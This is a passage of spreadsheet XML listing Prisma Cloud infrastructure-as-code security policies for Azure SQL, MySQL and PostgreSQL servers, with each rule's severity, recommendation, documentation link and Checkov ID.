          <t>IaC:General:azure-mssql-server-security-alert-policy</t>
        </is>
      </c>
      <c r="W910" t="inlineStr">
        <is>
          <t>Ensure that 'Send Alerts To' is enabled for MSSQL servers</t>
        </is>
      </c>
      <c r="X910" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-7</t>
        </is>
      </c>
      <c r="Y910" t="inlineStr"/>
      <c r="Z910" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mssql_server_security_alert_policy"]}</t>
        </is>
      </c>
      <c r="AA910" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB910" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC910" t="inlineStr">
        <is>
          <t>CKV_AZURE_26</t>
        </is>
      </c>
      <c r="AD910" t="b">
        <v>1</v>
      </c>
      <c r="AE910" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF910" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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0" t="inlineStr">
        <is>
          <t>447412e1-8112-465f-8c61-4ce16971c062</t>
        </is>
      </c>
      <c r="AI910" t="inlineStr"/>
      <c r="AJ910" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK910" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" t="inlineStr"/>
      <c r="B911" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C911" s="2" t="inlineStr"/>
      <c r="D911" t="inlineStr"/>
      <c r="E911" t="inlineStr"/>
      <c r="F911" t="inlineStr"/>
      <c r="G911" t="b">
        <v>1</v>
      </c>
      <c r="H9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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J911" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql</t>
        </is>
      </c>
      <c r="K911" t="inlineStr">
        <is>
          <t>Azure SQL Server ADS Vulnerability Assessment (VA) Periodic recurring scans is disabled</t>
        </is>
      </c>
      <c r="L911" t="inlineStr"/>
      <c r="M911" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N911" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O911" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P911" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q911" t="inlineStr"/>
      <c r="R911" t="inlineStr"/>
      <c r="S911" t="inlineStr"/>
      <c r="T911" t="b">
        <v>0</v>
      </c>
      <c r="U911" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V911" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql-server-security-alert-policy,azure-sql-server,azure-mssql-server-vulnerability-assessment</t>
        </is>
      </c>
      <c r="W911" t="inlineStr">
        <is>
          <t>Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server</t>
        </is>
      </c>
      <c r="X911" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server</t>
        </is>
      </c>
      <c r="Y911" t="inlineStr"/>
      <c r="Z911" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mssql_server_security_alert_policy","azurerm_sql_server","azurerm_mssql_server_vulnerability_assessment"]}</t>
        </is>
      </c>
      <c r="AA911" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB911" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC911" t="inlineStr">
        <is>
          <t>CKV2_AZURE_3</t>
        </is>
      </c>
      <c r="AD911" t="b">
        <v>1</v>
      </c>
      <c r="AE911" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF911" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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1" t="inlineStr">
        <is>
          <t>1b1990cf-fff3-40c0-bd02-7e1ca01cd3f3</t>
        </is>
      </c>
      <c r="AI911" t="inlineStr"/>
      <c r="AJ911" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK911" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" t="inlineStr"/>
      <c r="B912" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C912" s="2" t="inlineStr"/>
      <c r="D912" t="inlineStr"/>
      <c r="E912" t="inlineStr"/>
      <c r="F912" t="inlineStr"/>
      <c r="G912" t="b">
        <v>1</v>
      </c>
      <c r="H9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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J912" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql</t>
        </is>
      </c>
      <c r="K912" t="inlineStr">
        <is>
          <t>Azure SQL Server ADS Vulnerability Assessment (VA) 'Also send email notifications to admins and subscription owners' is disabled</t>
        </is>
      </c>
      <c r="L912" t="inlineStr"/>
      <c r="M912" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N912" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O912" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P912" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q912" t="inlineStr"/>
      <c r="R912" t="inlineStr"/>
      <c r="S912" t="inlineStr"/>
      <c r="T912" t="b">
        <v>0</v>
      </c>
      <c r="U912" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V912" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql-server-security-alert-policy,azure-sql-server,azure-mssql-server-vulnerability-assessment</t>
        </is>
      </c>
      <c r="W912" t="inlineStr">
        <is>
          <t>Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server</t>
        </is>
      </c>
      <c r="X912" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server</t>
        </is>
      </c>
      <c r="Y912" t="inlineStr"/>
      <c r="Z912" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mssql_server_security_alert_policy","azurerm_sql_server","azurerm_mssql_server_vulnerability_assessment"]}</t>
        </is>
      </c>
      <c r="AA912" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB912" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC912" t="inlineStr">
        <is>
          <t>CKV2_AZURE_5</t>
        </is>
      </c>
      <c r="AD912" t="b">
        <v>1</v>
      </c>
      <c r="AE912" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF912" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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2" t="inlineStr">
        <is>
          <t>7749b15d-ac15-49c9-b97a-c496ec5132aa</t>
        </is>
      </c>
      <c r="AI912" t="inlineStr"/>
      <c r="AJ912" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK912" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" t="inlineStr"/>
      <c r="B913" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C913" s="2" t="inlineStr"/>
      <c r="D913" t="inlineStr"/>
      <c r="E913" t="inlineStr"/>
      <c r="F913" t="inlineStr"/>
      <c r="G913" t="b">
        <v>1</v>
      </c>
      <c r="H9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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J913" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql</t>
        </is>
      </c>
      <c r="K913" t="inlineStr">
        <is>
          <t>Azure SQL Server ADS Vulnerability Assessment (VA) 'Send scan reports to' is not configured</t>
        </is>
      </c>
      <c r="L913" t="inlineStr"/>
      <c r="M913" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N913" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O913" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P913" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q913" t="inlineStr"/>
      <c r="R913" t="inlineStr"/>
      <c r="S913" t="inlineStr"/>
      <c r="T913" t="b">
        <v>0</v>
      </c>
      <c r="U913" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V913" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql-server-vulnerability-assessment,azure-sql-server,azure-mssql-server-security-alert-policy</t>
        </is>
      </c>
      <c r="W913" t="inlineStr">
        <is>
          <t>Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server</t>
        </is>
      </c>
      <c r="X913" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server</t>
        </is>
      </c>
      <c r="Y913" t="inlineStr"/>
      <c r="Z913" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mssql_server_vulnerability_assessment","azurerm_sql_server","azurerm_mssql_server_security_alert_policy"]}</t>
        </is>
      </c>
      <c r="AA913" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB913" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC913" t="inlineStr">
        <is>
          <t>CKV2_AZURE_4</t>
        </is>
      </c>
      <c r="AD913" t="b">
        <v>1</v>
      </c>
      <c r="AE913" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF913" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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3" t="inlineStr">
        <is>
          <t>0d407687-9f9f-445c-b471-1f69c1acd55b</t>
        </is>
      </c>
      <c r="AI913" t="inlineStr"/>
      <c r="AJ913" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK913" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" t="inlineStr"/>
      <c r="B914" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C914" s="2" t="inlineStr"/>
      <c r="D914" t="inlineStr"/>
      <c r="E914" t="inlineStr"/>
      <c r="F914" t="inlineStr"/>
      <c r="G914" t="b">
        <v>1</v>
      </c>
      <c r="H9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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J914" t="inlineStr">
        <is>
          <t>IaC:General:azure-mysql</t>
        </is>
      </c>
      <c r="K914" t="inlineStr">
        <is>
          <t>MySQL server disables infrastructure encryption</t>
        </is>
      </c>
      <c r="L914" t="inlineStr"/>
      <c r="M914" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N914" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O914" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P914" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q914" t="inlineStr"/>
      <c r="R914" t="inlineStr"/>
      <c r="S914" t="inlineStr"/>
      <c r="T914" t="b">
        <v>0</v>
      </c>
      <c r="U914" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V914" t="inlineStr">
        <is>
          <t>IaC:General:azure-mysql-server</t>
        </is>
      </c>
      <c r="W914" t="inlineStr">
        <is>
          <t>Ensure that MySQL server enables infrastructure encryption</t>
        </is>
      </c>
      <c r="X914" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption-1</t>
        </is>
      </c>
      <c r="Y914" t="inlineStr"/>
      <c r="Z914" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mysql_server"]}</t>
        </is>
      </c>
      <c r="AA914" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB914" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC914" t="inlineStr">
        <is>
          <t>CKV_AZURE_96</t>
        </is>
      </c>
      <c r="AD914" t="b">
        <v>1</v>
      </c>
      <c r="AE914" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF914" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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4" t="inlineStr">
        <is>
          <t>a2afadb2-7c9d-4445-bc3b-2304774ca62e</t>
        </is>
      </c>
      <c r="AI914" t="inlineStr"/>
      <c r="AJ914" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK914" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" t="inlineStr"/>
      <c r="B915" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C915" s="2" t="inlineStr"/>
      <c r="D915" t="inlineStr"/>
      <c r="E915" t="inlineStr"/>
      <c r="F915" t="inlineStr"/>
      <c r="G915" t="b">
        <v>1</v>
      </c>
      <c r="H9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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J915" t="inlineStr">
        <is>
          <t>IaC:General:azure-mysql</t>
        </is>
      </c>
      <c r="K915" t="inlineStr">
        <is>
          <t>My SQL server disables geo-redundant backups</t>
        </is>
      </c>
      <c r="L915" t="inlineStr"/>
      <c r="M915" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N915" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O915" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P915" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q915" t="inlineStr"/>
      <c r="R915" t="inlineStr"/>
      <c r="S915" t="inlineStr"/>
      <c r="T915" t="b">
        <v>0</v>
      </c>
      <c r="U915" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V915" t="inlineStr">
        <is>
          <t>IaC:General:azure-mysql-server</t>
        </is>
      </c>
      <c r="W915" t="inlineStr">
        <is>
          <t>Ensure that My SQL server enables geo-redundant backups</t>
        </is>
      </c>
      <c r="X915" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-geo-redundant-backups</t>
        </is>
      </c>
      <c r="Y915" t="inlineStr"/>
      <c r="Z915" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mysql_server"]}</t>
        </is>
      </c>
      <c r="AA915" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB915" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC915" t="inlineStr">
        <is>
          <t>CKV_AZURE_94</t>
        </is>
      </c>
      <c r="AD915" t="b">
        <v>1</v>
      </c>
      <c r="AE915" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF915" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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5" t="inlineStr">
        <is>
          <t>3e47b7e8-5bd9-4b23-8d8e-90ed96249654</t>
        </is>
      </c>
      <c r="AI915" t="inlineStr"/>
      <c r="AJ915" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK915" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" t="inlineStr"/>
      <c r="B916" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C916" s="2" t="inlineStr"/>
      <c r="D916" t="inlineStr"/>
      <c r="E916" t="inlineStr"/>
      <c r="F916" t="inlineStr"/>
      <c r="G916" t="b">
        <v>1</v>
      </c>
      <c r="H9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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J916" t="inlineStr">
        <is>
          <t>IaC:General:azure-mysql</t>
        </is>
      </c>
      <c r="K916" t="inlineStr">
        <is>
          <t>MySQL is not using the latest version of TLS encryption</t>
        </is>
      </c>
      <c r="L916" t="inlineStr"/>
      <c r="M916" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N916" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O916" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P916" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q916" t="inlineStr"/>
      <c r="R916" t="inlineStr"/>
      <c r="S916" t="inlineStr"/>
      <c r="T916" t="b">
        <v>0</v>
      </c>
      <c r="U916" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V916" t="inlineStr">
        <is>
          <t>IaC:General:azure-mysql-server</t>
        </is>
      </c>
      <c r="W916" t="inlineStr">
        <is>
          <t>Ensure MySQL is using the latest version of TLS encryption</t>
        </is>
      </c>
      <c r="X916" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-mysql-is-using-the-latest-version-of-tls-encryption</t>
        </is>
      </c>
      <c r="Y916" t="inlineStr"/>
      <c r="Z916" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mysql_server"]}</t>
        </is>
      </c>
      <c r="AA916" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB916" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC916" t="inlineStr">
        <is>
          <t>CKV_AZURE_54</t>
        </is>
      </c>
      <c r="AD916" t="b">
        <v>1</v>
      </c>
      <c r="AE916" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF916" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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6" t="inlineStr">
        <is>
          <t>a27abd50-b6c4-41bd-9395-72fa70b69185</t>
        </is>
      </c>
      <c r="AI916" t="inlineStr"/>
      <c r="AJ916" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK916" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" t="inlineStr"/>
      <c r="B917" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C917" s="2" t="inlineStr"/>
      <c r="D917" t="inlineStr"/>
      <c r="E917" t="inlineStr"/>
      <c r="F917" t="inlineStr"/>
      <c r="G917" t="b">
        <v>1</v>
      </c>
      <c r="H9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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J917" t="inlineStr">
        <is>
          <t>IaC:General:azure-mysql</t>
        </is>
      </c>
      <c r="K917" t="inlineStr">
        <is>
          <t>My SQL server does not enable Threat Detection policy</t>
        </is>
      </c>
      <c r="L917" t="inlineStr"/>
      <c r="M917" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N917" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O917" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P917" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q917" t="inlineStr"/>
      <c r="R917" t="inlineStr"/>
      <c r="S917" t="inlineStr"/>
      <c r="T917" t="b">
        <v>0</v>
      </c>
      <c r="U917" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V917" t="inlineStr">
        <is>
          <t>IaC:General:azure-mysql-server</t>
        </is>
      </c>
      <c r="W917" t="inlineStr">
        <is>
          <t>Ensure that My SQL server enables Threat detection policy</t>
        </is>
      </c>
      <c r="X917" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-threat-detection-policy</t>
        </is>
      </c>
      <c r="Y917" t="inlineStr"/>
      <c r="Z917" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mysql_server"]}</t>
        </is>
      </c>
      <c r="AA917" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB917" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC917" t="inlineStr">
        <is>
          <t>CKV_AZURE_127</t>
        </is>
      </c>
      <c r="AD917" t="b">
        <v>1</v>
      </c>
      <c r="AE917" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF917" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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7" t="inlineStr">
        <is>
          <t>a2c15b15-6ca3-4c3f-a4de-923ff60abd26</t>
        </is>
      </c>
      <c r="AI917" t="inlineStr"/>
      <c r="AJ917" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK917" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" t="inlineStr"/>
      <c r="B918" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C918" s="2" t="inlineStr"/>
      <c r="D918" t="inlineStr"/>
      <c r="E918" t="inlineStr"/>
      <c r="F918" t="inlineStr"/>
      <c r="G918" t="b">
        <v>1</v>
      </c>
      <c r="H9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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J918" t="inlineStr">
        <is>
          <t>IaC:General:azure-mysql</t>
        </is>
      </c>
      <c r="K918" t="inlineStr">
        <is>
          <t>MySQL server does not enable customer-managed key for encryption</t>
        </is>
      </c>
      <c r="L918" t="inlineStr"/>
      <c r="M918" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N918" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O918" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P918" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q918" t="inlineStr"/>
      <c r="R918" t="inlineStr"/>
      <c r="S918" t="inlineStr"/>
      <c r="T918" t="b">
        <v>0</v>
      </c>
      <c r="U918" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V918" t="inlineStr">
        <is>
          <t>IaC:General:azure-mysql-server-key,azure-mysql-server</t>
        </is>
      </c>
      <c r="W918" t="inlineStr">
        <is>
          <t>Ensure that MySQL server enables customer-managed key for encryption</t>
        </is>
      </c>
      <c r="X918" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-mysql-server-enables-customer-managed-key-for-encryption</t>
        </is>
      </c>
      <c r="Y918" t="inlineStr"/>
      <c r="Z918" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mysql_server_key","azurerm_mysql_server"]}</t>
        </is>
      </c>
      <c r="AA918" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB918" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC918" t="inlineStr">
        <is>
          <t>CKV2_AZURE_16</t>
        </is>
      </c>
      <c r="AD918" t="b">
        <v>1</v>
      </c>
      <c r="AE918" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF918" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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8" t="inlineStr">
        <is>
          <t>e0fb57de-942d-4e6e-b9df-3342c415bc21</t>
        </is>
      </c>
      <c r="AI918" t="inlineStr"/>
      <c r="AJ918" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK918" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" t="inlineStr"/>
      <c r="B919" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C919" s="2" t="inlineStr"/>
      <c r="D919" t="inlineStr"/>
      <c r="E919" t="inlineStr"/>
      <c r="F919" t="inlineStr"/>
      <c r="G919" t="b">
        <v>1</v>
      </c>
      <c r="H9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19" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J919" t="inlineStr">
        <is>
          <t>IaC:General:azure-postgresql</t>
        </is>
      </c>
      <c r="K919" t="inlineStr">
        <is>
          <t>Azure PostgreSQL Flexible Server does not enable geo-redundant backups</t>
        </is>
      </c>
      <c r="L919" t="inlineStr"/>
      <c r="M919" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N919" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O919" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P919" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q919" t="inlineStr"/>
      <c r="R919" t="inlineStr"/>
      <c r="S919" t="inlineStr"/>
      <c r="T919" t="b">
        <v>0</v>
      </c>
      <c r="U919" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V919" t="inlineStr">
        <is>
          <t>IaC:General:azure-postgresql-flexible-server</t>
        </is>
      </c>
      <c r="W919" t="inlineStr">
        <is>
          <t>Ensure that PostgreSQL Flexible server enables geo-redundant backups</t>
        </is>
      </c>
      <c r="X919" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups</t>
        </is>
      </c>
      <c r="Y919" t="inlineStr"/>
      <c r="Z919" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_postgresql_flexible_server"]}</t>
        </is>
      </c>
      <c r="AA919" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB919" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC919" t="inlineStr">
        <is>
          <t>CKV_AZURE_136</t>
        </is>
      </c>
      <c r="AD919" t="b">
        <v>1</v>
      </c>
      <c r="AE919" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF919" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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19" t="inlineStr">
        <is>
          <t>9777c0b0-c852-452b-bc68-9b8da93b222a</t>
        </is>
      </c>
      <c r="AI919" t="inlineStr"/>
      <c r="AJ919" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK919" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" t="inlineStr"/>
      <c r="B920" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C920" s="2" t="inlineStr"/>
      <c r="D920" t="inlineStr"/>
      <c r="E920" t="inlineStr"/>
      <c r="F920" t="inlineStr"/>
      <c r="G920" t="b">
        <v>1</v>
      </c>
      <c r="H9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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J920" t="inlineStr">
        <is>
          <t>IaC:General:azure-postgresql</t>
        </is>
      </c>
      <c r="K920" t="inlineStr">
        <is>
          <t>PostgreSQL server does not enable infrastructure encryption</t>
        </is>
      </c>
      <c r="L920" t="inlineStr"/>
      <c r="M920" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N920" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O920" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P920" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q920" t="inlineStr"/>
      <c r="R920" t="inlineStr"/>
      <c r="S920" t="inlineStr"/>
      <c r="T920" t="b">
        <v>0</v>
      </c>
      <c r="U920" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V920" t="inlineStr">
        <is>
          <t>IaC:General:azure-postgresql-server</t>
        </is>
      </c>
      <c r="W920" t="inlineStr">
        <is>
          <t>Ensure that PostgreSQL server enables infrastructure encryption</t>
        </is>
      </c>
      <c r="X920" t="inlineStr">
        <is>
